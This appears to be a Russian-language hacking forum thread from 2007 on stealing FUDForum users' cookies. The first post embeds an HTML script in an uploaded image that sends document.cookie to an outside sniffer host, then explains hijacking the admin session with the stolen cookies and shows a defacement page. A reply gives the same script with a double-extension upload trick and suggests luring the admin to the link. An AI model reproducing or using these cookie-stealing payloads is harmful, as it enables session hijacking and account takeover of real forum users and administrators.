Форумы Уязвимость FUDForum, Ворование куков FUDForum

Discussion in 'Уязвимости CMS/форумов' started by HiMiC, 29 Jan 2007.

  1. HiMiC

    HiMiC Member

    Joined:
    22 Dec 2006
    Messages:
    18
    Likes Received:
    11
    Reputations:
    0
    Вобщем делается так:
    Берём картинку, с названием 1.jpg
    Открываем блокнотом. И вставляем в картинку допустим

    HTML:
    <html> 
    <head> 
    <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
    </head> 
    </html> 
    
    После вставки в сообщение будет ссылка наподобии этой:
    http://forum.site.ru/index.php?t=getfile&id=2723&private=0
    или так нагляднее:
    http://forum.site.ru/index.php?t=getfile&id=2723
    После открытия этой ссылки произойдёт кража куков пользователей
    На проверку кода PHP ещё не проверял, но возможно.
    ******
    Далее идем сюда:
    http://old.antichat.ru/sniff/log.php
    И вставляем куки себе. И ты админ.

    Можно поприкалываться и так:

    HTML:
    <html> 
    <head> 
    <h1>Defaced by HiMiC</h1> 
    </head> 
    </html> 
     
    #1 HiMiC, 29 Jan 2007
    Last edited: 29 Jan 2007
    2 people like this.
  2. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    я чуть-чуть делаю на форуме по другому
    сначала нахожу в инете какуюто интересную хтмл
    сохраняю ее
    потом вписываю в нее код
    -------------------------------------------------------------------------------------
    <html>
    <head>
    <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    </head>
    </html>
    -------------------------------------------------------------------------------------------
    сохраняю и переминовываю в тип stranica.rar(или другой формат который поддерживает форум для заливки).html
    потом заливаю это на форум в любую тему
    также эту ссылку кидаю админу
    потом только стоит подменить куки и вы юзер , модер , админ
    и делайте че хотите
    способ заливки stranica.rar.html выходит на многих форумах в которых проблеми с фильтрацией
    П.С. также можна таким методом залить страницу в аватары , и поставить на аватар, только потом код будет чуть-чуть другой
     
  3. Zion

    Zion New Member

    Joined:
    30 Jan 2007
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    HiMiC, вообщем пробывал в картинку вставить этот код, но она почему то не открывается. Подскажи, что то может не правильно делаю? И еще вопрос, как на других форумах это проделывать ?
     
    #3 Zion, 8 Feb 2007
    Last edited: 8 Feb 2007
  4. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    никому такого не пожелаю, просто ужас

    __http://security.nnov.ru/Jdocument612.html